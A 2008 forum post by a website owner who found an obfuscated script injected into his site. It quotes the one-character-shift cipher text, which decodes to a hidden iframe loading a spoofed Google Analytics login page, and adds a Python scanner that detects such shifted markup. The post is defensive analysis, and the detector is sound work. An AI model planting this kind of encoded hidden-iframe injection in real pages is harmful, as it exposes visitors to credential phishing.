mcmunsta - 3:49 pm on May 14, 2008 (gmt 0)
Recently my website was labeled as hosting badware. I have always run a clean site and have advertised using the Google Adwords program for several years. Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.

Here is the original code:

="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg

And here is what I translated it to:

script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – http://www.example.com.diamond.i.index/php.out - document - write – str – substring – 68-226 – str – substring – 1-68 – script

Here's where it gets interesting. If you were to go to example.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a user's login information and then capture that information before sending the person through to the Google Analytics site. I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.

It is ironic that Google flagged our account as providing malicious code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I received notification of data loss on the analytics side during the same time this other issue was going on. I've asked Google if there has been a security breach and will update this thread once I receive a response.
[edited by: Robert_Charlton at 6:35 pm (utc) on May 14, 2008]
I posted this on another thread related to data loss by Google Analytics however I think this is relevant to this discussion as well...
Google would only tell me that they see a malicious code on our site, one that I had trouble identifying.
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";
[edit reason] changed to example.com [/edit]
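
The string quoted in the post has every character moved up one code point, so a site owner can hunt for the same trick by un-shifting each line of a page and checking whether markup appears. This is an added example, not part of the original post: the function names, marker list and thresholds are assumptions, the sample page is constructed around the encoded fragment quoted above, and it goes beyond the post by trying shifts of up to five in either direction.

```python
# Markup tokens that should not appear only after un-shifting a line.
# This marker list is an assumption chosen for the example.
MARKERS = ("<script", "<iframe", "document.write", "visibility", "style=", "src=")


def shift(text, k):
    """Move each printable ASCII character k code points; keep everything else."""
    out = []
    for ch in text:
        code = ord(ch) + k
        in_range = 0x20 <= ord(ch) <= 0x7E and 0x20 <= code <= 0x7E
        out.append(chr(code) if in_range else ch)
    return "".join(out)


def scan(source, max_shift=5, min_hits=2):
    """Return (line_no, shift, markers, decoded) for lines hiding markup."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for k in range(-max_shift, max_shift + 1):
            if k == 0:
                continue  # the unshifted line is ordinary, visible markup
            decoded = shift(line, k)
            low = decoded.lower()
            hits = [m for m in MARKERS if m in low]
            if len(hits) >= min_hits:
                findings.append((line_no, k, hits, decoded))
    return findings


# Constructed sample page; line 3 wraps the encoded fragment from the post.
SAMPLE = "\n".join([
    "<html><body>",
    "<p>Welcome to our store.</p>",
    'var s="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg";',
    "</body></html>",
])

if __name__ == "__main__":
    for line_no, k, hits, decoded in scan(SAMPLE):
        print(f"line {line_no}: shift {k:+d} reveals {hits}")
        print("   ", decoded)
```

Requiring at least two markers on one line keeps ordinary text, which can produce a single token by chance when shifted, from being reported.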